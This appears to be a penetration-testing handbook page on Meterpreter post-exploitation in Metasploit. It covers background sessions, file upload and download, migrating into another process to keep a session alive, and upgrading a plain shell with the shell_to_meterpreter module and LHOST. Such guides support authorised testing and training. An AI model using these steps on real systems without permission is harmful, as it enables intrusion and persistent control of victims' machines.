Meterpreter shell for post-exploitation

By now you probably has some kind of shell to the target. If it is not a meterpreter shell you should probably try to turn the current shell into a meterpreter shell, since it gives you a lot of tools available really easy.

So just create a meterpreter-shell from msfvenom or something like that. Maybe a php-shell. Or whatever you have access to. Then you just fire that script and get your meterpreter shell. Check out the chapter Exploiting/Msfvenom for more about creating payloads.

Basics

List all commands

help

Get help about a specific command

help upload

Sessions

So first some basics. You can put the shell into a background job with the command background. This might be useful if you have several shells going at the same time. Or if you want to move to a specific directory to upload or download some files.

List background sessions

background -l

Connect back to a background session

background -i 1

Upload and download files.

upload
download

Scripts

Migrate

A really common and useful script that is build into metasploit is the migrate script. If you get the shell through some kind of exploits that crashes a program the user might shut down that program and it will close your session. So you need to migrate your session to another process. You can do that with the migrate script.

First run this command to output all processes

ps

Now you choose one and run

run migrate -p 1327

Where the -p is the PID of the process.

Post modules

There are tons of modules specifically created for post-exploitation. They can be found with

use post/

Upgrade a normal shell to metepreter

There is a point in doing stuff through metasploit. For example, if you find a exploit that does not have meterpreter available as a payload you can just start a normal shell and then upgrade it. To do that you do the following:

First you generate a shell through metasploit, either through a specici exploit or through a msfvenom-shell that you upload. Now that you have a normal shell it is time to upgrade it to a meterpreter shell.

First we have to leave the shell but without killing it. So we do

Ctr-z
Background session 2? [y/N]  y

Now we have that shell running in the background, and you can see it with

show sessions
#or
sessions -l

And you can connect to it again with

sessions -i 1

Or whatever the number of the session is.

So now we have the shell running in the background. It is time to upgrade

use post/multi/manage/shell_to_meterpreter
set LHOST ip
set session 1
exploit

Now metasploit will create a new session with meterpeter that will be available to you.

Last updated